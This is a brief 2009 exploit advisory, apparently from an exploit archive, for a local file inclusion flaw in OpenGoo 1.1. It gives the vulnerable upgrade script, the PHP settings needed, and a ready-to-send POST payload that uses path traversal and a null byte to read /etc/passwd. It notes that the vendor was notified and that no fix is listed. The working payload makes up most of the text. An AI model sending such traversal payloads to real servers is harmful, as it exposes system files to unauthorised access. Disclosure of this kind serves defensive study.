OpenGoo 1.1 (script_class) Local File Inclusion Vulnerability

2009-01-25 06:07:44

OpenGoo 1.1 Local File Inclusion
http://www.opengoo.org/

magic_quotes_gpc = Off
register_globals = On

http://site/opengoo/public/upgrade/index.php
POST: form_data[script_class]=/../../../../../../../../../../../etc/passwd%00.html

Author Notified: Jan. 18

http://nukeit.org

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.